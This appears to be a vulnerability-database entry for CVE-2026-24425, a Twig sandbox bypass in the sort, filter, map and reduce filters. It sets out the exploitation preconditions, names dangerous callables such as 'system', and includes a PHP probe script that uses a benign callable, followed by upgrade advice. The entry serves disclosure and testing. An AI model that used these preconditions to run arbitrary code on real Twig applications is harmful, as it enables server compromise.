CVE-2026-24425
Description
Twig versions 2.16.x and 3.9.0 through 3.25.x contain a sandbox bypass vulnerability when using a SourcePolicyInterface that allows attackers with template rendering capabilities to pass arbitrary PHP callables to sort, filter, map, and reduce filters. Attackers can exploit the runtime check that fails to use the current template source to bypass sandbox restrictions and execute arbitrary code when the sandbox is enabled through a source policy rather than globally.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Twig 2.16.x and 3.9.0 through 3.25.x allow a sandbox bypass when the sandbox is enabled through a SourcePolicyInterface rather than globally: an attacker who controls a rendered template can pass arbitrary PHP callables to the sort, filter, map and reduce filters and execute arbitrary code.
Vulnerability
Twig versions 2.16.x and 3.9.0 through 3.25.x contain a sandbox bypass vulnerability affecting the sort, filter, map, and reduce filters. When the sandbox is enabled through a SourcePolicyInterface rather than globally, the runtime check that rejects non-Closure callables does not use the current template Source, allowing user-controlled templates to pass arbitrary PHP callables [1], [2]. The bug exists because the sandbox enforcement is not source-aware in these callback-accepting filters [2].
Exploitation
Exploitation requires an attacker who can supply a template that the application renders, plus all four of the following conditions: (1) the sandbox is not enabled globally; (2) a SourcePolicyInterface enables the sandbox for the rendered template; (3) the template uses one of the affected filters (sort, filter, map or reduce); and (4) the callback passed to that filter is not a Closure. A Twig arrow function (v => ...) compiles to a PHP Closure and passes the check; a string or array naming a PHP function or method does not, and that is what the attacker supplies. Under these conditions the runtime check, which does not consult the template's Source, treats the render as non-sandboxed and accepts callables such as 'system' or ['Shell', 'exec'] [2].
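The following PHP script is an added example, not code from the Twig project or from the advisory. It builds the configuration the four preconditions describe (sandbox enabled only through a source policy, a sandboxed template that passes a non-Closure callback to map) and probes whether the runtime check rejects it, using a benign callable instead of 'system' so the probe is safe to run against a real build. It assumes Twig 3.9 or later installed via Composer and the SandboxExtension constructor of the 3.9 API (policy, sandboxed-globally flag, source policy); UserTemplatePolicy, the template names and the two functions are hypothetical, and the templates are constructed inputs.

```php
<?php
// Added example, not code from the Twig project or the advisory. Assumes
// Twig 3.9+ installed via Composer and the SandboxExtension constructor
// (policy, sandboxed-globally flag, source policy) of the 3.9 API.
// UserTemplatePolicy, the template names and the two functions are
// hypothetical; the templates are constructed inputs.
declare(strict_types=1);

require __DIR__ . '/vendor/autoload.php';

use Twig\Environment;
use Twig\Error\Error as TwigError;
use Twig\Extension\SandboxExtension;
use Twig\Loader\ArrayLoader;
use Twig\Sandbox\SecurityPolicy;
use Twig\Sandbox\SourcePolicyInterface;
use Twig\Source;

// Hypothetical source policy: sandbox only templates named "user/...".
// With the extension's global flag off, this gives precondition (2) without (1).
final class UserTemplatePolicy implements SourcePolicyInterface
{
    public function enableSandbox(Source $source): bool
    {
        return str_starts_with($source->getName(), 'user/');
    }
}

function buildEnvironment(bool $sandboxedGlobally): Environment
{
    $loader = new ArrayLoader([
        // Constructed attacker template: the callback to |map is a plain PHP
        // function name, not a Closure (preconditions 3 and 4). A benign
        // callable stands in for the 'system' of the advisory; the check
        // being bypassed is the same one.
        'user/profile.twig' => "{{ ['id']|map('strtoupper')|join }}",
        // Legitimate use: a Twig arrow function compiles to a PHP Closure,
        // which the sandbox accepts.
        'user/greeting.twig' => "{{ ['id']|map(v => v ~ '!')|join }}",
    ]);

    $env = new Environment($loader, ['cache' => false]);
    // Allow only the two filters the templates use: no tags, methods,
    // properties or functions.
    $policy = new SecurityPolicy([], ['map', 'join'], [], [], []);
    $env->addExtension(new SandboxExtension($policy, $sandboxedGlobally, new UserTemplatePolicy()));

    return $env;
}

// 'rendered' means the non-Closure callback was executed; 'rejected' means
// Twig raised an error (the sandbox refused the callback) instead.
function probeNonClosureCallback(bool $sandboxedGlobally): string
{
    try {
        buildEnvironment($sandboxedGlobally)->render('user/profile.twig');
        return 'rendered';
    } catch (TwigError $e) {
        return 'rejected';
    }
}

echo 'arrow-function callback: ', buildEnvironment(false)->render('user/greeting.twig'), PHP_EOL;
echo 'sandbox via source policy only: ', probeNonClosureCallback(false), PHP_EOL;
echo 'sandbox enabled globally:       ', probeNonClosureCallback(true), PHP_EOL;
```

Per the advisory, an affected build reports 'rendered' for the source-policy-only probe, because the check never sees the template's Source, while 3.26.0 or later reports 'rejected'. The globally sandboxed probe reports 'rejected' on either, since precondition (1) does not hold there; that is a consequence of the listed preconditions, not a documented workaround, and the advisory lists none. The arrow-function template renders on every version, which is the behaviour the Closure check is meant to preserve.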
Impact
Successful exploitation allows an attacker to execute arbitrary PHP code in the context of the application. This leads to full compromise of confidentiality, integrity, and availability — including data disclosure, file manipulation, and remote code execution [2], [3].
Mitigation
The fix was released in Twig v3.26.0 on 2026-05-20; it propagates the current template Source to the callback-accepting filters and uses it when deciding whether sandbox restrictions apply [1], [2]. Upgrade to 3.26.0 or later. The advisory names no fixed release on the 2.16.x line, so installations still on 2.x should move to 3.26.0 or later, applying whatever 2.x-to-3.x migration changes the application needs. No workaround is documented [2].
AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products: 1
Patches: 0 (no patches indexed yet; the fixing release is given under Mitigation)
Vulnerability mechanics: not yet generated for this CVE
References: 3 (cited above as [1], [2], [3])
News mentions: 0 (no linked articles indexed yet)